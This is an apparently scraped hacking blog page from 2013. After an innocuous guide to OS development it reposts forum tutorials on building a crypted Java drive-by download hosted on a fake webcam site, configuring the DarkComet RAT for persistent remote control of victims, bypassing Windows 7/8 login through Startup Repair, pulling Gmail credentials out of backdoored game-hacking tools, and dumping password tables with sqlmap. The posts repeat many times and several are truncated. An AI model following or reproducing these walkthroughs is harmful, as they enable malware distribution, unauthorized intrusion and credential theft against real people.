Wednesday, September 18, 2013

 
 Steps :-

1) Learn Programming before you begin. Assembly Language is vital, another supplementary low level language such as C is strongly recommended .

2) Decide what media you want to load your OS on. It can be a CD drive, DVD drive, flash drive, a hard disk, or another PC.

3) Decide what you want your OS to do. Whether it is a fully capable OS with a graphical user interface (GUI) or something a bit more minimalism, you'll need to know what direction you are taking it before beginning.

4) Target what processor platform your operating system will support. AI-32 and x86_64 are the two most common for personal computers so they're your best bet.

5) Decide if you would rather do it all yourself from the ground up, or if there is an existing kernel you would like to build on top of. Linux from Scratch is a project for those that would like to build their own Linux distro .

6) Decide if you're going to use your own bootloader or a pre-created one such as Grand Unified Bootloader (GRUB). While coding your own bootloader will give a lot of knowledge of the hardware and the BIOS, it may set you back on the programming of the actual kernel.

7) Decide what programming language to use. While it is possible to create an operating system in a language such as Pascal or BASIC, you will be better off using C or Assembly. Assembly is absolutely necessary, as some vital parts of an operating system require it. C++, on the other hand, contains keywords that need another fully-built OS to run.
--> In order to compile an operating system from C or C++ code, you will of course be using one compiler or another. You should therefore read the user guide/manuals/documentation for your chosen C/C++ compiler, whether it comes packaged with the software or is available on the distributor's website. You will need to know many intricate things about your compiler and, for C++ development, you should know about the compiler's mangling scheme and its ABI. You are expected to understand the various executable formats (ELF, PE, COFF, plain binary, etc.), and understand that the Windows proprietary format, PE (.exe), has been copyrighted.

Decide on your application programming interface (API). One good API to choose is POSIX, which is well documented. All Unix systems have at least partial support for POSIX, so it would be trivial to port Unix programs to your OS.

9) Decide on your design. There are monolithic kernels and microkernels. Monolithic kernels implement all the services in the kernel, while microkernels have a small kernel combined with user daemons implementing services. In general, monolithic kernels are faster, but microkernels have better fault isolation and reliability.

10) Consider developing working in a team. That way, less time is required to solve more problems, producing a better OS.

11) Do not wipe your hard drive completely. Remember, wiping your drive will clear out all your data and is irreversible! Use GRUB or another boot manager to dual-boot your system with another OS until yours is fully functional.

12) Start small. Begin with small things such as displaying text and interrupts before moving on to things such as memory management and multitasking.

13) Keep a backup of the last working source. In case something goes terribly wrong with the current version or your development PC crashes and is unable to boot, it is an excellent idea to have a second copy to work with/troubleshoot.

14) Consider testing your new operating system with a virtual machine. Rather than rebooting your computer each time you make changes or having to transfer the files from your development computer to your test machine, you use a virtual machine application to run your OS while your current OS is still running. VM applications include VMWare (which also has a freely available server product), the open-source alternative Bochs, Microsoft Virtual PC (not compatible with Linux), and xVM VirtualBox.

15) Release a "release candidate." This will allow users to tell you about potential problems with your operating system.

16) An operating system can be user friendly too.

Important Notice :-

Do not start an operating system project in order to begin learning programming. If you don't already know C, C++, Pascal, or some other suitable language inside out, including pointer manipulation, low-level bit manipulation, bit shifting, inline assembly language, etc., you are not ready for operating-system development.

How to Make a Computer Operating System

Posted at  7:32 PM - by devil 0

 
 Steps :-

1) Learn Programming before you begin. Assembly Language is vital, another supplementary low level language such as C is strongly recommended .

2) Decide what media you want to load your OS on. It can be a CD drive, DVD drive, flash drive, a hard disk, or another PC.

3) Decide what you want your OS to do. Whether it is a fully capable OS with a graphical user interface (GUI) or something a bit more minimalism, you'll need to know what direction you are taking it before beginning.

4) Target what processor platform your operating system will support. AI-32 and x86_64 are the two most common for personal computers so they're your best bet.

5) Decide if you would rather do it all yourself from the ground up, or if there is an existing kernel you would like to build on top of. Linux from Scratch is a project for those that would like to build their own Linux distro .

6) Decide if you're going to use your own bootloader or a pre-created one such as Grand Unified Bootloader (GRUB). While coding your own bootloader will give a lot of knowledge of the hardware and the BIOS, it may set you back on the programming of the actual kernel.

7) Decide what programming language to use. While it is possible to create an operating system in a language such as Pascal or BASIC, you will be better off using C or Assembly. Assembly is absolutely necessary, as some vital parts of an operating system require it. C++, on the other hand, contains keywords that need another fully-built OS to run.
--> In order to compile an operating system from C or C++ code, you will of course be using one compiler or another. You should therefore read the user guide/manuals/documentation for your chosen C/C++ compiler, whether it comes packaged with the software or is available on the distributor's website. You will need to know many intricate things about your compiler and, for C++ development, you should know about the compiler's mangling scheme and its ABI. You are expected to understand the various executable formats (ELF, PE, COFF, plain binary, etc.), and understand that the Windows proprietary format, PE (.exe), has been copyrighted.

Decide on your application programming interface (API). One good API to choose is POSIX, which is well documented. All Unix systems have at least partial support for POSIX, so it would be trivial to port Unix programs to your OS.

9) Decide on your design. There are monolithic kernels and microkernels. Monolithic kernels implement all the services in the kernel, while microkernels have a small kernel combined with user daemons implementing services. In general, monolithic kernels are faster, but microkernels have better fault isolation and reliability.

10) Consider developing working in a team. That way, less time is required to solve more problems, producing a better OS.

11) Do not wipe your hard drive completely. Remember, wiping your drive will clear out all your data and is irreversible! Use GRUB or another boot manager to dual-boot your system with another OS until yours is fully functional.

12) Start small. Begin with small things such as displaying text and interrupts before moving on to things such as memory management and multitasking.

13) Keep a backup of the last working source. In case something goes terribly wrong with the current version or your development PC crashes and is unable to boot, it is an excellent idea to have a second copy to work with/troubleshoot.

14) Consider testing your new operating system with a virtual machine. Rather than rebooting your computer each time you make changes or having to transfer the files from your development computer to your test machine, you use a virtual machine application to run your OS while your current OS is still running. VM applications include VMWare (which also has a freely available server product), the open-source alternative Bochs, Microsoft Virtual PC (not compatible with Linux), and xVM VirtualBox.

15) Release a "release candidate." This will allow users to tell you about potential problems with your operating system.

16) An operating system can be user friendly too.

Important Notice :-

Do not start an operating system project in order to begin learning programming. If you don't already know C, C++, Pascal, or some other suitable language inside out, including pointer manipulation, low-level bit manipulation, bit shifting, inline assembly language, etc., you are not ready for operating-system development.

0 comments:

 How To Make a FUD Java Drive

Everyone please read this if you are curious about this tutorial -

I have taken the link down because it is not FUD anymore.

I went away from HF for quit sometime and this tutorial continued to thrive I received hundreds of PM's asking for direct links to this and now that I am back I realize that the link is for a survey which then leads you to the Java Drive By

Although the Java Drive By is no longer FUD the tutorial is still good and because of this I hope you continue to use it :)

Thanks everyone!
Hey Hack Forums today I am going to be showing you how to make a FUD Java Drive By!

These are all the files you are going to need to make this possible :)


[Image: bEaGC.png]

Setting Up Your Server
-First you are going to have to make your server which I would name java.exe instead of server.exe more convincing
-Next you are going to need to find a crypter, this will make it so your server is FUD (Fully Undetectable).
-You can find a free crypter by using the search button or buy a private crypter in the marketplace: http://www.hackforums.net/forumdisplay.php?fid=107

Setting Up Your Index.html
-Upload your server too: http://www.largedocument.com/

[Image: 2WXln.png]

-Hit browse and upload your server.exe
-Now hit the button that looks like a clipboard, this will copy your direct link.
[Image: B7LD3.png]

-Now go to the folder you downloaded and open your index.html with notepad
-Scroll all the way to the bottom. Look for where it says "your server download link"

[Image: FEOWW.png]

-Simply paste your largedocument direct link in there
-Save that

Setting Up 000webhost
-Go to http://www.000webhost.com
-Hit the "sign up" button and create an account
-When making an account use the free subdomain

[Image: C7Upp.png]

-TIP: Since this is posing as a fake webcam site, make it something like "mywebcamshow.net76.net"
-Now you are going to have log into your account to do this click where it says members area. This is right above where you sign up.
-It will take 24 hours for your domain to become active, you can open up a ticket in the "Get Help" tab. State that you have waited 24 hours and need your domain active this sometimes works, or just wait ;)

Adding your files to 000webhost
-Once it is active you need to hit "Go To Cpanel"
-Once inside the control panel find "File Manager"

[Image: JtPg0.png]

-Open the file manager, if it asks for a password it is just the one you made to start with.
-Go into your public_html
-Delete the files that are in there
-Upload all of the files in the folder that you downloaded.

[Image: KX2PM.png]

-Your done! Your java drive by is up and ready to go! :)

Extras
-Go to http://www.tk this is going to be used to shorten your url from "mywebcamshow.net76.net" to "webcamshow.tk"

[Image: FtUUB.jpg]

-Where is says "Enter your URL here..." enter your 000webhost URL Ex: "mywebcamshow.net76.net"

Important
-Your website may not be working for others right away. This is because an admin has to check your site before fully activating it!
-If this is the case simply open a ticket in the "Get Help" tab and ask them when it will be done! :)

Final Product

[Image: 0akIN.png]

How To Make a FUD Java Drive

Posted at  7:51 AM - by devil 0

 How To Make a FUD Java Drive

Everyone please read this if you are curious about this tutorial -

I have taken the link down because it is not FUD anymore.

I went away from HF for quit sometime and this tutorial continued to thrive I received hundreds of PM's asking for direct links to this and now that I am back I realize that the link is for a survey which then leads you to the Java Drive By

Although the Java Drive By is no longer FUD the tutorial is still good and because of this I hope you continue to use it :)

Thanks everyone!
Hey Hack Forums today I am going to be showing you how to make a FUD Java Drive By!

These are all the files you are going to need to make this possible :)


[Image: bEaGC.png]

Setting Up Your Server
-First you are going to have to make your server which I would name java.exe instead of server.exe more convincing
-Next you are going to need to find a crypter, this will make it so your server is FUD (Fully Undetectable).
-You can find a free crypter by using the search button or buy a private crypter in the marketplace: http://www.hackforums.net/forumdisplay.php?fid=107

Setting Up Your Index.html
-Upload your server too: http://www.largedocument.com/

[Image: 2WXln.png]

-Hit browse and upload your server.exe
-Now hit the button that looks like a clipboard, this will copy your direct link.
[Image: B7LD3.png]

-Now go to the folder you downloaded and open your index.html with notepad
-Scroll all the way to the bottom. Look for where it says "your server download link"

[Image: FEOWW.png]

-Simply paste your largedocument direct link in there
-Save that

Setting Up 000webhost
-Go to http://www.000webhost.com
-Hit the "sign up" button and create an account
-When making an account use the free subdomain

[Image: C7Upp.png]

-TIP: Since this is posing as a fake webcam site, make it something like "mywebcamshow.net76.net"
-Now you are going to have log into your account to do this click where it says members area. This is right above where you sign up.
-It will take 24 hours for your domain to become active, you can open up a ticket in the "Get Help" tab. State that you have waited 24 hours and need your domain active this sometimes works, or just wait ;)

Adding your files to 000webhost
-Once it is active you need to hit "Go To Cpanel"
-Once inside the control panel find "File Manager"

[Image: JtPg0.png]

-Open the file manager, if it asks for a password it is just the one you made to start with.
-Go into your public_html
-Delete the files that are in there
-Upload all of the files in the folder that you downloaded.

[Image: KX2PM.png]

-Your done! Your java drive by is up and ready to go! :)

Extras
-Go to http://www.tk this is going to be used to shorten your url from "mywebcamshow.net76.net" to "webcamshow.tk"

[Image: FtUUB.jpg]

-Where is says "Enter your URL here..." enter your 000webhost URL Ex: "mywebcamshow.net76.net"

Important
-Your website may not be working for others right away. This is because an admin has to check your site before fully activating it!
-If this is the case simply open a ticket in the "Get Help" tab and ask them when it will be done! :)

Final Product

[Image: 0akIN.png]

0 comments:

Tuesday, September 17, 2013

How to setup Dark Comet 5.3.1

Black Hat DARK COMET RAT SETUP Black Hat

Hello fellow user's of HF this is my first contribution to the HF Community even though this has probably been posted 10,000 times its how i use/setup my rat successful so lets get started.

I will be showing you a way to set up Dark comet.

So now you need to go download Dark Comet 5.3.1

Black Hat No-Ip Set-Up & Dark Comet Black Hat

Firstly go to No-Ip and make an account.

Now once you log in you will come to this screen
[Image: 98246a066136c48949a7be18fa14bbff.png]


Then Press "Add Host" Now you need to fill this screen in:
[Image: 22d95ab83715b2a08cc5a3fa4cc8712c.png]


Then select add host.

Now download the No-Ip Client which can be found on the website your currently on.

Now you must decide what port you would like to use.
It doesn't really matter i dont think but pick a number between 1000-1500.


Then when you have dark comet loaded go to socks/net tab then right click the top box and press "add port to listen" Example:
[Image: e2d55b367835c2281b3a13b0007c8a2e.png]


I will not go through the port forwarding part due to the fact i don't have this issue as my dark comet automatically opens the ports for me which follows for most people.

But if you want to see if you get this luxury like me just turn on no-ip client and open dark comet then go to http://www.canyouseeme.org type the port you picked in the following step.

If it says "Success: I can see your service on (IP) on port (1384)
Your ISP is not blocking port (your picked port)

Your good to go but if it says:

"Error: I could not see your service on (IP) on port (Port)
Reason: Connection timed out"

Then look for a port forwarding tutorial which there's loads on HF.


Now before you create your Rat server go to your no-ip client then press edit host's and make sure the host we created in previous steps on no-ip.org is selected so when its all correct it should look like this:
[Image: d8914d7dc54295462866fc3de7d9eed0.png]

(Cant show full screen as it has my email/ip address)


Now go to dark comet and press the dark comet button in top left.
Then hover over server module then press full editor. (small editor works but i like having full control over my settings).

Go through each tab and select all the settings you would like but MAKE SURE you have these options done.

on main settings press random multiple times on the process mutex
[Image: 4707f6888abf7105305ce8976454ac68.png]


Network settings fill in the no-ip host we made then press add.

Now that's the main setup done.

Just go through each setting tab and select what you prefer but remember making your rat disabling things like task manager ect makes it suspicious so i suggest to keep your slave/victim longer just leave unticked but make sure you tick persistent come back.

Now that's it.

But i HUGELY suggest you buy a FUD Crypter (Fully undetectable crypter) basically stop's security programs detecting it as a virus so people remove before you get access.

And that is pretty much it.

How to setup Dark Comet 5.3.1

Posted at  8:11 PM - by devil 0

How to setup Dark Comet 5.3.1

Black Hat DARK COMET RAT SETUP Black Hat

Hello fellow user's of HF this is my first contribution to the HF Community even though this has probably been posted 10,000 times its how i use/setup my rat successful so lets get started.

I will be showing you a way to set up Dark comet.

So now you need to go download Dark Comet 5.3.1

Black Hat No-Ip Set-Up & Dark Comet Black Hat

Firstly go to No-Ip and make an account.

Now once you log in you will come to this screen
[Image: 98246a066136c48949a7be18fa14bbff.png]


Then Press "Add Host" Now you need to fill this screen in:
[Image: 22d95ab83715b2a08cc5a3fa4cc8712c.png]


Then select add host.

Now download the No-Ip Client which can be found on the website your currently on.

Now you must decide what port you would like to use.
It doesn't really matter i dont think but pick a number between 1000-1500.


Then when you have dark comet loaded go to socks/net tab then right click the top box and press "add port to listen" Example:
[Image: e2d55b367835c2281b3a13b0007c8a2e.png]


I will not go through the port forwarding part due to the fact i don't have this issue as my dark comet automatically opens the ports for me which follows for most people.

But if you want to see if you get this luxury like me just turn on no-ip client and open dark comet then go to http://www.canyouseeme.org type the port you picked in the following step.

If it says "Success: I can see your service on (IP) on port (1384)
Your ISP is not blocking port (your picked port)

Your good to go but if it says:

"Error: I could not see your service on (IP) on port (Port)
Reason: Connection timed out"

Then look for a port forwarding tutorial which there's loads on HF.


Now before you create your Rat server go to your no-ip client then press edit host's and make sure the host we created in previous steps on no-ip.org is selected so when its all correct it should look like this:
[Image: d8914d7dc54295462866fc3de7d9eed0.png]

(Cant show full screen as it has my email/ip address)


Now go to dark comet and press the dark comet button in top left.
Then hover over server module then press full editor. (small editor works but i like having full control over my settings).

Go through each tab and select all the settings you would like but MAKE SURE you have these options done.

on main settings press random multiple times on the process mutex
[Image: 4707f6888abf7105305ce8976454ac68.png]


Network settings fill in the no-ip host we made then press add.

Now that's the main setup done.

Just go through each setting tab and select what you prefer but remember making your rat disabling things like task manager ect makes it suspicious so i suggest to keep your slave/victim longer just leave unticked but make sure you tick persistent come back.

Now that's it.

But i HUGELY suggest you buy a FUD Crypter (Fully undetectable crypter) basically stop's security programs detecting it as a virus so people remove before you get access.

And that is pretty much it.

0 comments:

How to setup Dark Comet 5.3.1

Black Hat DARK COMET RAT SETUP Black Hat

Hello fellow user's of HF this is my first contribution to the HF Community even though this has probably been posted 10,000 times its how i use/setup my rat successful so lets get started.

I will be showing you a way to set up Dark comet.

So now you need to go download Dark Comet 5.3.1

Black Hat No-Ip Set-Up & Dark Comet Black Hat

Firstly go to No-Ip and make an account.

Now once you log in you will come to this screen
[Image: 98246a066136c48949a7be18fa14bbff.png]


Then Press "Add Host" Now you need to fill this screen in:
[Image: 22d95ab83715b2a08cc5a3fa4cc8712c.png]


Then select add host.

Now download the No-Ip Client which can be found on the website your currently on.

Now you must decide what port you would like to use.
It doesn't really matter i dont think but pick a number between 1000-1500.


Then when you have dark comet loaded go to socks/net tab then right click the top box and press "add port to listen" Example:
[Image: e2d55b367835c2281b3a13b0007c8a2e.png]


I will not go through the port forwarding part due to the fact i don't have this issue as my dark comet automatically opens the ports for me which follows for most people.

But if you want to see if you get this luxury like me just turn on no-ip client and open dark comet then go to http://www.canyouseeme.org type the port you picked in the following step.

If it says "Success: I can see your service on (IP) on port (1384)
Your ISP is not blocking port (your picked port)

Your good to go but if it says:

"Error: I could not see your service on (IP) on port (Port)
Reason: Connection timed out"

Then look for a port forwarding tutorial which there's loads on HF.


Now before you create your Rat server go to your no-ip client then press edit host's and make sure the host we created in previous steps on no-ip.org is selected so when its all correct it should look like this:
[Image: d8914d7dc54295462866fc3de7d9eed0.png]

(Cant show full screen as it has my email/ip address)


Now go to dark comet and press the dark comet button in top left.
Then hover over server module then press full editor. (small editor works but i like having full control over my settings).

Go through each tab and select all the settings you would like but MAKE SURE you have these options done.

on main settings press random multiple times on the process mutex
[Image: 4707f6888abf7105305ce8976454ac68.png]


Network settings fill in the no-ip host we made then press add.

Now that's the main setup done.

Just go through each setting tab and select what you prefer but remember making your rat disabling things like task manager ect makes it suspicious so i suggest to keep your slave/victim longer just leave unticked but make sure you tick persistent come back.

Now that's it.

But i HUGELY suggest you buy a FUD Crypter (Fully undetectable crypter) basically stop's security programs detecting it as a virus so people remove before you get access.

And that is pretty much it.

How to setup Dark Comet 5.3.1

Posted at  8:11 PM - by devil 0

How to setup Dark Comet 5.3.1

Black Hat DARK COMET RAT SETUP Black Hat

Hello fellow user's of HF this is my first contribution to the HF Community even though this has probably been posted 10,000 times its how i use/setup my rat successful so lets get started.

I will be showing you a way to set up Dark comet.

So now you need to go download Dark Comet 5.3.1

Black Hat No-Ip Set-Up & Dark Comet Black Hat

Firstly go to No-Ip and make an account.

Now once you log in you will come to this screen
[Image: 98246a066136c48949a7be18fa14bbff.png]


Then Press "Add Host" Now you need to fill this screen in:
[Image: 22d95ab83715b2a08cc5a3fa4cc8712c.png]


Then select add host.

Now download the No-Ip Client which can be found on the website your currently on.

Now you must decide what port you would like to use.
It doesn't really matter i dont think but pick a number between 1000-1500.


Then when you have dark comet loaded go to socks/net tab then right click the top box and press "add port to listen" Example:
[Image: e2d55b367835c2281b3a13b0007c8a2e.png]


I will not go through the port forwarding part due to the fact i don't have this issue as my dark comet automatically opens the ports for me which follows for most people.

But if you want to see if you get this luxury like me just turn on no-ip client and open dark comet then go to http://www.canyouseeme.org type the port you picked in the following step.

If it says "Success: I can see your service on (IP) on port (1384)
Your ISP is not blocking port (your picked port)

Your good to go but if it says:

"Error: I could not see your service on (IP) on port (Port)
Reason: Connection timed out"

Then look for a port forwarding tutorial which there's loads on HF.


Now before you create your Rat server go to your no-ip client then press edit host's and make sure the host we created in previous steps on no-ip.org is selected so when its all correct it should look like this:
[Image: d8914d7dc54295462866fc3de7d9eed0.png]

(Cant show full screen as it has my email/ip address)


Now go to dark comet and press the dark comet button in top left.
Then hover over server module then press full editor. (small editor works but i like having full control over my settings).

Go through each tab and select all the settings you would like but MAKE SURE you have these options done.

on main settings press random multiple times on the process mutex
[Image: 4707f6888abf7105305ce8976454ac68.png]


Network settings fill in the no-ip host we made then press add.

Now that's the main setup done.

Just go through each setting tab and select what you prefer but remember making your rat disabling things like task manager ect makes it suspicious so i suggest to keep your slave/victim longer just leave unticked but make sure you tick persistent come back.

Now that's it.

But i HUGELY suggest you buy a FUD Crypter (Fully undetectable crypter) basically stop's security programs detecting it as a virus so people remove before you get access.

And that is pretty much it.

0 comments:

 How To Hack Windows 8 / Windows 7 Login Easily, 
No tools or software


Let yourself right in! No need for downloading a utility, tool, or software. Just follow these easy steps and you will walk right in the front door! I couldn't believe it was so easy myself... Just tried it and it worked like a charm.


hat you will need:
-A computer with Win7 or Win8
Um... That's it.

1-First, you will start up the computer (or restart it).

2-While the computer is coming up and you can see it saying, "Starting Windows," grab and hold down the power button until it does a hard-shutdown.

3-This will make Windows have an issue. It will think it is broken and ask you if you want to Launch Repair, or Start Normally. You will choose to Launch Startup Repair.

4-Startup repair will boot up and take a little while, then it will ask you if you want to use a System Restore Point. You are going to choose "Cancel."

5-Now is the long part... You will wait, and wait. After a long time, you will get a dialogue telling you that Startup Repair could not repair the computer automatically! What! After all that waiting? That is okay, because this plays right into our plans. So, you will click on the down arrow in the bottom left so you can see the Problem Details.

6-Now you will click on the link at the very end of the Detail Report. It is the link for the Privacy Statement.

7-Notepad will come up with the Privacy statement in it. You will go on the File menu and go to Open.

8-Using the Open Dialogue, you will go to "Computer" to "Local Disk" to "Windows" to "System 32"

9-Now, don't forget to switch from "Text Documents" to "All Files" so you can see every file in this folder.

10-To see the completion of this tutorial in word form, as well as many wonderful pictures to go along with it, you will have to jump over to:

How To Hack Windows 8 / Windows 7 Login Easily, No tools or software

Posted at  8:04 PM - by devil 0

 How To Hack Windows 8 / Windows 7 Login Easily, 
No tools or software


Let yourself right in! No need for downloading a utility, tool, or software. Just follow these easy steps and you will walk right in the front door! I couldn't believe it was so easy myself... Just tried it and it worked like a charm.


hat you will need:
-A computer with Win7 or Win8
Um... That's it.

1-First, you will start up the computer (or restart it).

2-While the computer is coming up and you can see it saying, "Starting Windows," grab and hold down the power button until it does a hard-shutdown.

3-This will make Windows have an issue. It will think it is broken and ask you if you want to Launch Repair, or Start Normally. You will choose to Launch Startup Repair.

4-Startup repair will boot up and take a little while, then it will ask you if you want to use a System Restore Point. You are going to choose "Cancel."

5-Now is the long part... You will wait, and wait. After a long time, you will get a dialogue telling you that Startup Repair could not repair the computer automatically! What! After all that waiting? That is okay, because this plays right into our plans. So, you will click on the down arrow in the bottom left so you can see the Problem Details.

6-Now you will click on the link at the very end of the Detail Report. It is the link for the Privacy Statement.

7-Notepad will come up with the Privacy statement in it. You will go on the File menu and go to Open.

8-Using the Open Dialogue, you will go to "Computer" to "Local Disk" to "Windows" to "System 32"

9-Now, don't forget to switch from "Text Documents" to "All Files" so you can see every file in this folder.

10-To see the completion of this tutorial in word form, as well as many wonderful pictures to go along with it, you will have to jump over to:

0 comments:

                         Hack a Gmail Account Easily

Okay I will make the Tutorial Short and Clear. For this I'll Explain you STEP by STEP.


-Go to Youtube

-Search "Runescape Hacker" or "Runescape Hacker Download Link"

-Find the Download Link (They are usually in the comments Section.)

-Download the Runescape Hacker Tool.

-Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Separate Area.

-Download HexWorshop. Google it and you will Find the Link.

-Install HexWorkshop.

-Now go to the downloaded RunescapeHacker Phile and Right Click on it !

-Now You Will see something like "Edit this with HexWorkshop" Click It !

-Now you will see the HexWorkshop Screenie. Do Nothing, You will Feel confused for the First time But Believe it's Easy.

-Just go to the Edit on the Top and Find a Button "Find"

-When you get 'Find", Click on it !

-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

-Now Enter "Gmail" to the Box and Hit "Find".

-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

-Copy the Highlighted text and Paste it in a Text document (Newly Created).

-Remove the [.]>DOTs and You will see The Email ID + the Passwd.


Happy hacking

How To Hack a Gmail Account Easily

Posted at  7:56 PM - by devil 0

                         Hack a Gmail Account Easily

Okay I will make the Tutorial Short and Clear. For this I'll Explain you STEP by STEP.


-Go to Youtube

-Search "Runescape Hacker" or "Runescape Hacker Download Link"

-Find the Download Link (They are usually in the comments Section.)

-Download the Runescape Hacker Tool.

-Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Separate Area.

-Download HexWorshop. Google it and you will Find the Link.

-Install HexWorkshop.

-Now go to the downloaded RunescapeHacker Phile and Right Click on it !

-Now You Will see something like "Edit this with HexWorkshop" Click It !

-Now you will see the HexWorkshop Screenie. Do Nothing, You will Feel confused for the First time But Believe it's Easy.

-Just go to the Edit on the Top and Find a Button "Find"

-When you get 'Find", Click on it !

-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

-Now Enter "Gmail" to the Box and Hit "Find".

-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

-Copy the Highlighted text and Paste it in a Text document (Newly Created).

-Remove the [.]>DOTs and You will see The Email ID + the Passwd.


Happy hacking

0 comments:

                         Hack a Gmail Account Easily

Okay I will make the Tutorial Short and Clear. For this I'll Explain you STEP by STEP.


-Go to Youtube

-Search "Runescape Hacker" or "Runescape Hacker Download Link"

-Find the Download Link (They are usually in the comments Section.)

-Download the Runescape Hacker Tool.

-Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Separate Area.

-Download HexWorshop. Google it and you will Find the Link.

-Install HexWorkshop.

-Now go to the downloaded RunescapeHacker Phile and Right Click on it !

-Now You Will see something like "Edit this with HexWorkshop" Click It !

-Now you will see the HexWorkshop Screenie. Do Nothing, You will Feel confused for the First time But Believe it's Easy.

-Just go to the Edit on the Top and Find a Button "Find"

-When you get 'Find", Click on it !

-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

-Now Enter "Gmail" to the Box and Hit "Find".

-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

-Copy the Highlighted text and Paste it in a Text document (Newly Created).

-Remove the [.]>DOTs and You will see The Email ID + the Passwd.


Happy hacking

How To Hack a Gmail Account Easily

Posted at  7:55 PM - by devil 0

                         Hack a Gmail Account Easily

Okay I will make the Tutorial Short and Clear. For this I'll Explain you STEP by STEP.


-Go to Youtube

-Search "Runescape Hacker" or "Runescape Hacker Download Link"

-Find the Download Link (They are usually in the comments Section.)

-Download the Runescape Hacker Tool.

-Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Separate Area.

-Download HexWorshop. Google it and you will Find the Link.

-Install HexWorkshop.

-Now go to the downloaded RunescapeHacker Phile and Right Click on it !

-Now You Will see something like "Edit this with HexWorkshop" Click It !

-Now you will see the HexWorkshop Screenie. Do Nothing, You will Feel confused for the First time But Believe it's Easy.

-Just go to the Edit on the Top and Find a Button "Find"

-When you get 'Find", Click on it !

-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

-Now Enter "Gmail" to the Box and Hit "Find".

-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

-Copy the Highlighted text and Paste it in a Text document (Newly Created).

-Remove the [.]>DOTs and You will see The Email ID + the Passwd.


Happy hacking

0 comments:

         Website Hacking: SQL Injection With Backtrack 5


To start off I would like to explain what SQL Injection Attack are,

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
(www.http://en.wikipedia.org)

I would also like to add that, I dont use Backtrack to perform SQL injection attacks, but I know how to, so I figured I would put a tutorial up on it.

Ok to start off you are going to need Backtrack, here is a video tutorial on installing it
Installing Backtrack 5 on Windows

Once installed you will need to navigate to
Exploitation Tools > Web Exploitation Tools > sqlmap
Once clicked a console like window will appear you will then need to type the following code

Code:
python.py -u http://sitename.com/dorkhere?id=32 --dbs
This code will make backtrack scan your site

Once done you should see multiple database names, you will then need to type

Code:
python.py -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere --Tables
This will then collect the tables from that database, once done you should have a list of all the tables from that database, you should try and choose a table that is something like users,pwd,passwords,members,admin, you will now need to type this code in

Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T TableNameHere --columns
This will then gather all the columns form that table

You should be able to see a list of columns, yet again you need to look out for something like users,pwd,passwords,members,admin, you will then need to type this code in

Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T allowed -c columnName --dump







You will then get the information that you wanted,
Thanks for reading, I really hope this tutorial has helped you Black Hat
Note: SqlMap and backtrack overall does leave logs, so watch out for what sites you try and hack

Website Hacking: SQL Injection With Backtrack 5

Posted at  7:51 PM - by devil 0

         Website Hacking: SQL Injection With Backtrack 5


To start off I would like to explain what SQL Injection Attack are,

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
(www.http://en.wikipedia.org)

I would also like to add that, I dont use Backtrack to perform SQL injection attacks, but I know how to, so I figured I would put a tutorial up on it.

Ok to start off you are going to need Backtrack, here is a video tutorial on installing it
Installing Backtrack 5 on Windows

Once installed you will need to navigate to
Exploitation Tools > Web Exploitation Tools > sqlmap
Once clicked a console like window will appear you will then need to type the following code

Code:
python.py -u http://sitename.com/dorkhere?id=32 --dbs
This code will make backtrack scan your site

Once done you should see multiple database names, you will then need to type

Code:
python.py -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere --Tables
This will then collect the tables from that database, once done you should have a list of all the tables from that database, you should try and choose a table that is something like users,pwd,passwords,members,admin, you will now need to type this code in

Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T TableNameHere --columns
This will then gather all the columns form that table

You should be able to see a list of columns, yet again you need to look out for something like users,pwd,passwords,members,admin, you will then need to type this code in

Code:
python.py sqlmap -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere -T allowed -c columnName --dump







You will then get the information that you wanted,
Thanks for reading, I really hope this tutorial has helped you Black Hat
Note: SqlMap and backtrack overall does leave logs, so watch out for what sites you try and hack

0 comments:

         Website Hacking: SQL Injection With Backtrack 5


To start off I would like to explain what SQL Injection Attack are,

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
(www.http://en.wikipedia.org)

I would also like to add that, I dont use Backtrack to perform SQL injection attacks, but I know how to, so I figured I would put a tutorial up on it.

Ok to start off you are going to need Backtrack, here is a video tutorial on installing it
Installing Backtrack 5 on Windows

Once installed you will need to navigate to
Exploitation Tools > Web Exploitation Tools > sqlmap
Once clicked a console like window will appear you will then need to type the following code

Code:
python.py -u http://sitename.com/dorkhere?id=32 --dbs
This code will make backtrack scan your site

Once done you should see multiple database names, you will then need to type

Code:
python.py -u http://sitename.com/dorkhere?id=32 -D DatebaseNameHere --Tables
This will then collect the tables from that database, once done you should have a list of all the tables from that database, you should try and choose a table that is something like users,pwd,passwords,members,admin, you will now need to type this code in

